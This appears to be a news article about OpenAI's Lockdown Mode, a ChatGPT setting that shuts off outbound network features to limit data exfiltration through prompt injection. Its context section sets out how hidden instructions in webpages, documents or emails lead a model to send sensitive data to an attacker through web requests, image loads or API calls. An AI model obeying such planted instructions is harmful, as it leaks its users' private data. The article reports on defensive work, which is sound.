OpenAI launches Lockdown Mode to block data exfiltration via prompt injection

OpenAI has launched Lockdown Mode, a new security feature for ChatGPT designed to reduce the risk of sensitive data being exfiltrated through prompt injection attacks. The feature is now rolling out to ChatGPT Business accounts and eligible personal accounts.

What's new

Lockdown Mode is an opt-in setting that constrains ChatGPT's external network access when handling sensitive workflows. When enabled, the following capabilities are disabled or restricted:

• Live web browsing — limited to cached content only; no live network requests leave OpenAI's controlled infrastructure
• Image retrieval from the web — disabled
• Deep Research (including shopping research) — disabled
• Agent Mode — disabled
• Canvas networking — disabled
• Live connectors — disabled
• File downloads — disabled

OpenAI is explicit about the intended audience: "Lockdown Mode is not intended for everyone. It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection."

Important caveat: Lockdown Mode does not prevent prompt injections from appearing in processed content. A malicious instruction embedded in cached web content or an uploaded file could still influence ChatGPT's behavior or response accuracy — the feature stops the exfiltration channel, not the injection itself.

Context

Prompt injection is an attack class where malicious instructions are hidden inside content that an AI model processes — a webpage, document, or email. A successful injection can cause a model to silently send sensitive information to an attacker-controlled destination through a web request, image load, or API call. Lockdown Mode closes those outbound channels while preserving cached web access.

OpenAI has been developing what it calls the "Atlas" hardening initiative: a layered set of structural defenses against prompt injection in ChatGPT's agent and tool surfaces. Lockdown Mode is the first user-facing control tier built on top of those defenses, giving organizations a blunt but reliable way to trade feature breadth for reduced exfiltration exposure.

The rollout targets ChatGPT Business accounts and eligible personal accounts first.

Why it matters

This is one of the first user-configurable security tiers from a major AI provider specifically targeting the prompt injection threat class. For enterprises deploying ChatGPT in sensitive workflows — legal document review, financial analysis, competitive research — Lockdown Mode provides a concrete and auditable risk reduction layer, even if not a complete solution.

The candid acknowledgment that the mode limits exfiltration channels but does not eliminate prompt injection as a threat is notable. It reflects that OpenAI views prompt injection as a persistent, systemic problem rather than a bug to be patched, and is choosing transparency about residual risk over overclaiming protection. That posture will matter as AI agents become more autonomous and handle higher-stakes information.